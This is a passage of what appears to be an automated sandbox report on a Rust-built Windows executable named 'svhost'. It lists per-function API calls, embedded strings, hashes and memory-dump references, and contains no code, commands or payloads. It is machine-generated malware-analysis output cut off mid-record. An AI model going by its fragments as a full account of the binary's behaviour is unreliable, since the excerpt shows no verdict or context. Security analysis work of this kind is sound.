7ff7af6f98db-7ff7af6f98eb 589->599 596 7ff7af6f9e89 592->596 597 7ff7af6f9e77-7ff7af6f9e84 call 7ff7af6bdc20 592->597 593->592 593->593 596->581 597->596 601 7ff7af6f9c04-7ff7af6f9c0b 598->601 602 7ff7af6f9be9-7ff7af6f9bf9 598->602 603 7ff7af6f98ed-7ff7af6f990d call 7ff7af6f9210 599->603 604 7ff7af6f991c-7ff7af6f9923 599->604 607 7ff7af6f9c11-7ff7af6f9c35 601->607 608 7ff7af6f9dad-7ff7af6f9db5 601->608 602->574 605 7ff7af6f9bff 602->605 613 7ff7af6f9913-7ff7af6f9917 call 7ff7af5314d0 603->613 614 7ff7af6f9b7e-7ff7af6f9b82 603->614 609 7ff7af6f994a-7ff7af6f994e 604->609 605->575 619 7ff7af6f9dbe-7ff7af6f9dcb CloseHandle 607->619 622 7ff7af6f9c3b-7ff7af6f9c44 607->622 608->619 611 7ff7af6f9954-7ff7af6f9957 609->611 612 7ff7af6f9b4a-7ff7af6f9b59 609->612 611->612 618 7ff7af6f995d-7ff7af6f998c call 7ff7af6f9210 611->618 615 7ff7af6f9b6d-7ff7af6f9b79 612->615 616 7ff7af6f9b5b-7ff7af6f9b68 call 7ff7af6bdc20 612->616 613->604 623 7ff7af6f9b84-7ff7af6f9ba0 call 7ff7af6154d0 614->623 624 7ff7af6f9ba2 614->624 615->589 616->615 635 7ff7af6f99b0-7ff7af6f99c7 CloseHandle 618->635 636 7ff7af6f998e-7ff7af6f99a2 618->636 619->582 626 7ff7af6f9ec5-7ff7af6f9ed6 CloseHandle 622->626 627 7ff7af6f9c4a-7ff7af6f9c5b 622->627 629 7ff7af6f9ba5-7ff7af6f9bbf 623->629 624->629 626->587 631 7ff7af6f9edc 626->631 627->608 633 7ff7af6f9bd3-7ff7af6f9bde 629->633 634 7ff7af6f9bc1-7ff7af6f9bce call 7ff7af6bdc20 629->634 631->592 633->584 634->633 639 7ff7af6f9941-7ff7af6f9947 SwitchToThread 635->639 640 7ff7af6f99cd-7ff7af6f9e3d 635->640 636->635 639->609 640->582 642 7ff7af6f9e3f-7ff7af6f9e58 call 7ff7af6bdc20 640->642 642->587 642->592
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: Handle$ErrorLast$CloseCurrentDuplicateFileInformationProcess
                                • String ID:
                                • API String ID: 780345077-0
                                • Opcode ID: 4f119b33221909102454e0eb755c90a9daf94b47fe2b19412b9ebf205cb6ba3a
                                • Instruction ID: 118b8e0821642ea28e2e86d5dd21dd591bfce1d68416b3661df9fe88138584a2
                                • Opcode Fuzzy Hash: 4f119b33221909102454e0eb755c90a9daf94b47fe2b19412b9ebf205cb6ba3a
                                • Instruction Fuzzy Hash: 28D1A233B0AB8189EB50AF21D8403ED67A9FB44798F955035EE4E57BA8DF38E446C350
                                Function 00007FF7AF5A9470 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 334COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF7AF5A9607
                                • FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.20\src\proto\streams\send.rs, xrefs: 00007FF7AF5A9958
                                • connection closed because of a broken pipe, xrefs: 00007FF7AF5A9550
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$Release$Acquire
                                • String ID: FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.20\src\proto\streams\send.rs$called `Result::unwrap()` on an `Err` value$connection closed because of a broken pipe
                                • API String ID: 1021914862-2110353437
                                • Opcode ID: 18035a8e22830c41f36b20a7847aefe9d70627d27c555f27361f254477f0e1d1
                                • Instruction ID: 387110e19488be2d1312f370f721792e2d73a6ebac21d34c472f562dde897d98
                                • Opcode Fuzzy Hash: 18035a8e22830c41f36b20a7847aefe9d70627d27c555f27361f254477f0e1d1
                                • Instruction Fuzzy Hash: 77E18236A0BBD589EB11AF25D8402E867A0FB49B98F954136DE4C177B5DF3CE056C320
                                Function 00007FF7AF63DAF0 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 341COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$Release$Acquire
                                • String ID: FieldSet corrupted (this is a bug)$StreamRef::drop; mutex poisoned$assertion failed: self.ref_count > 0$called `Result::unwrap()` on an `Err` value
                                • API String ID: 1021914862-2258212264
                                • Opcode ID: 8208c2ed60b1d99efeca7a44929f19ef0666e67bf3d8f3df036f0312b781d8f4
                                • Instruction ID: 3d5fbab37f4c47ff39e2e43046998d52e2dd9f5020243bb07709b2822b8f2448
                                • Opcode Fuzzy Hash: 8208c2ed60b1d99efeca7a44929f19ef0666e67bf3d8f3df036f0312b781d8f4
                                • Instruction Fuzzy Hash: E3029F36A06BC699EB54AF24D4803E8B3B5FB08748F915236DA4D13774DF38E595C360
                                Function 00007FF7AF5BD830 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 299COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$Release$Acquire
                                • String ID: buffer space exhausted; sending this messages would overflow the state$called `Result::unwrap()` on an `Err` value
                                • API String ID: 1021914862-1228284763
                                • Opcode ID: 99d946d92cf09db07bf2fdd61edeb5a4114ebc0c77e1e62fd461eadf6e42e422
                                • Instruction ID: b1cf1993cc8a3711ee7804b134de11fcca27743b648effe0f23a53c55b2e157b
                                • Opcode Fuzzy Hash: 99d946d92cf09db07bf2fdd61edeb5a4114ebc0c77e1e62fd461eadf6e42e422
                                • Instruction Fuzzy Hash: EEE1A022A0A7C189FB11AB24D4053E87BA0FB5974CF864235DE9C0B7A6DF7DE185C360
                                Function 00007FF7AF6C9930 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115memoryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: String$AllocFree$ClearVariant
                                • String ID: CriticalTripPoint$CurrentTemperature
                                • API String ID: 261499160-3920528518
                                • Opcode ID: 029109aa0f6b62b41823b911fb201c99c9dda7213dfdc02a3507fc3a8a1f87c1
                                • Instruction ID: 7677a9568b1b5c9285c0e8cbdac6df569af79f11abe2b6339f68c662026f40b4
                                • Opcode Fuzzy Hash: 029109aa0f6b62b41823b911fb201c99c9dda7213dfdc02a3507fc3a8a1f87c1
                                • Instruction Fuzzy Hash: FB51B022F15A958AE710EF6AD8403EDB771FB88B98F859221DE5D17BA4DF39D181C300
                                Function 00007FF7AF6F45E0 Relevance: 12.1, APIs: 8, Instructions: 76synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CloseHandle$ErrorLastObjectSingleWait
                                • String ID:
                                • API String ID: 1454876536-0
                                • Opcode ID: 18f7361c972c6380cea168caab1951d255704245e512cdc57e6f3a0ac00f4b2b
                                • Instruction ID: 7669650eb6f00c19e0653ea26c3501c3b9bb757d95dfcc6f9d8d0bbf0c7ed7d4
                                • Opcode Fuzzy Hash: 18f7361c972c6380cea168caab1951d255704245e512cdc57e6f3a0ac00f4b2b
                                • Instruction Fuzzy Hash: 3721783660A68191E7249F12F8002BAA7A5FB49B98F969131EE9D43B74CE3CD085D710
                                Function 00007FF7AF6C6F90 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 397COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • global_key_idle disappearedC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.29.7\src\windows\system.rs, xrefs: 00007FF7AF6C7582
                                • key_used disappeared, xrefs: 00007FF7AF6C756A
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CloseQuery$CollectCounterDataHandleRemove
                                • String ID: global_key_idle disappearedC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.29.7\src\windows\system.rs$key_used disappeared
                                • API String ID: 1237511099-2830639753
                                • Opcode ID: bec1a1bd61ca2a32d05caa79eb808c1c6b9d0fdad3e7a39b811a5da077c3f369
                                • Instruction ID: 3dbdb4963b9f60af349963ff729313bc02fa8e178e5a30cb10e08f84cbca791d
                                • Opcode Fuzzy Hash: bec1a1bd61ca2a32d05caa79eb808c1c6b9d0fdad3e7a39b811a5da077c3f369
                                • Instruction Fuzzy Hash: AF02D332A06BD185EB11AF25D8003F9A7B5FB44B98F866231DE9D577A5EF38D442C320
                                Function 00007FF7AF5C1850 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 272COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: AcquireExclusiveLock
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 4021432409-2333694755
                                • Opcode ID: 05a2e942d29c304c16f4ff5ac6aad0c29c9d956e5268126043f9c253eeb50326
                                • Instruction ID: 3b02b3da3e59835fcb550756bec327c0a434459e616de9c60843b9961a3de705
                                • Opcode Fuzzy Hash: 05a2e942d29c304c16f4ff5ac6aad0c29c9d956e5268126043f9c253eeb50326
                                • Instruction Fuzzy Hash: CEC19322A0AB8285EB15AF25D4403F967A0FF4479CF964536EE5E037A5DF38D886C370
                                Function 00007FF7AF623710 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 177threadCOMMON
                                Download Yara Rule
                                APIs
                                • SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7AF62375D
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7AF623806
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7AF623880
                                Strings
                                • assertion failed: (*tail).value.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.28\src\mpsc\queue.rs, xrefs: 00007FF7AF623918
                                • assertion failed: (*next).value.is_some(), xrefs: 00007FF7AF623930
                                • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF7AF623962
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireReleaseSwitchThread
                                • String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.28\src\mpsc\queue.rs$called `Result::unwrap()` on an `Err` value
                                • API String ID: 1670587934-2736147708
                                • Opcode ID: 6d059eecafadffd540e4de7e4cc91b5d52b5cae3933f73e679eddfa69deb60a2
                                • Instruction ID: b34cb503a8e8a01e9ecf6597e8b5dfd68005b914796db19cce1652b9b2633e48
                                • Opcode Fuzzy Hash: 6d059eecafadffd540e4de7e4cc91b5d52b5cae3933f73e679eddfa69deb60a2
                                • Instruction Fuzzy Hash: 8D81BC22E0AB8285FB11AF25D8013F8A3A5FB44754F855532DE4C0B7A1EF3DE195C361
                                Function 00007FF7AF5C1E70 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 165COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF7AF578499), ref: 00007FF7AF5C1EF5
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: AcquireExclusiveLock
                                • String ID: assertion failed: (*next).value.is_some()$called `Result::unwrap()` on an `Err` value
                                • API String ID: 4021432409-4268521122
                                • Opcode ID: e1b2a72275ca90213c51916c254cdc5c8f9da9207874ceda5ea5e7bd9bc5d92d
                                • Instruction ID: 1f6c5a3dfc7cab9a4af3f507556cc78fbdf69dc62410f60919ac2cd2161d794c
                                • Opcode Fuzzy Hash: e1b2a72275ca90213c51916c254cdc5c8f9da9207874ceda5ea5e7bd9bc5d92d
                                • Instruction Fuzzy Hash: 2B617D26A0AA8594FA11EF52D8406FDB7A0BB48B94F860536DE1D177E1DF3CE846C370
                                Function 00007FF7AF6F8BE0 Relevance: 9.2, APIs: 6, Instructions: 175COMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AF53367A), ref: 00007FF7AF6F8E1D
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AF53367A), ref: 00007FF7AF6F8E31
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CloseErrorHandleLast
                                • String ID:
                                • API String ID: 918212764-0
                                • Opcode ID: bba8866a94c9d47c0a66e04a146dc38317c8a65e46adf5701b2b31f1d9fede70
                                • Instruction ID: 50222bb751382f2103e91090ed104f14db9a5b75ba2edc3fea25aeb188755668
                                • Opcode Fuzzy Hash: bba8866a94c9d47c0a66e04a146dc38317c8a65e46adf5701b2b31f1d9fede70
                                • Instruction Fuzzy Hash: 29610C5390E2C142F770A721A504BB9EBAAAF557D0F9B21B1DD8E076E4DF3DD4488720
                                Function 00007FF7AF5AA520 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 354COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: 3e81b18e6243a7290f86d77e08c8e8585cbf1defc621b173b6f4f2755ad1693d
                                • Instruction ID: 346b057d6aa08f260601d9f85f18732c8a38438712b80a90dd355dda6932c4a9
                                • Opcode Fuzzy Hash: 3e81b18e6243a7290f86d77e08c8e8585cbf1defc621b173b6f4f2755ad1693d
                                • Instruction Fuzzy Hash: 02029D6290AAC1D9E732EF34D8453E977A4FB15348F854125DB8C0BAA6DF38D399C360
                                Function 00007FF7AF702960 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 218COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: Handle$CloseConsoleErrorLastMode
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 1170577072-2333694755
                                • Opcode ID: 8a59866f754363a445a3d55e9ec47a46b57843f61a206a50538af4f0c2c4b4d9
                                • Instruction ID: 9fdec8f11baf9b9b6a3edda6d80d025e04d6bb60204764600d31c039810f95ea
                                • Opcode Fuzzy Hash: 8a59866f754363a445a3d55e9ec47a46b57843f61a206a50538af4f0c2c4b4d9
                                • Instruction Fuzzy Hash: C3A1A626A0ABD294FB11AF61E8403FCA761BB08798FD54536DE9D137A4EF3C9585C320
                                Function 00007FF7AF5BD530 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 182threadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • assertion failed: (*next).value.is_some(), xrefs: 00007FF7AF5BD6FE
                                • FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.27\src\proto\h2\mod.rs, xrefs: 00007FF7AF5BD686
                                • C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.28\src\mpsc\mod.rs, xrefs: 00007FF7AF5BD60D
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: SwitchThread
                                • String ID: C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.28\src\mpsc\mod.rs$FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.27\src\proto\h2\mod.rs$assertion failed: (*next).value.is_some()
                                • API String ID: 115865932-4230457705
                                • Opcode ID: 60d9227346311dabae6e241bf385a3db545f3cabf91a5172e3d1756f2cddc2ab
                                • Instruction ID: a3c62b48fd349ba5d34fcae2ad3e3c4f5d973ae6dd9156eedec31390d9c7024f
                                • Opcode Fuzzy Hash: 60d9227346311dabae6e241bf385a3db545f3cabf91a5172e3d1756f2cddc2ab
                                • Instruction Fuzzy Hash: C9819236A0AB8195EB50AB11E4503F9B3A0FB88794FD54132DE8D07BA4EF3CE455CB20
                                Function 00007FF7AF5A5D90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: 3729bcd794a8ab560aa5f9d00b0a47c59e5b0d62005611c89d9e3c4d52b27dc0
                                • Instruction ID: 8646929452b056baaf091bdf74de3ad4dc362eaabcf39fe753e309a07e355a63
                                • Opcode Fuzzy Hash: 3729bcd794a8ab560aa5f9d00b0a47c59e5b0d62005611c89d9e3c4d52b27dc0
                                • Instruction Fuzzy Hash: EB716E7660ABD199EB51EF34E4846EC77A0FB08348F890175EA8D03BA5DF38D199C360
                                Function 00007FF7AF5A54D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 00007FF7AF5A5503
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 00007FF7AF5A5552
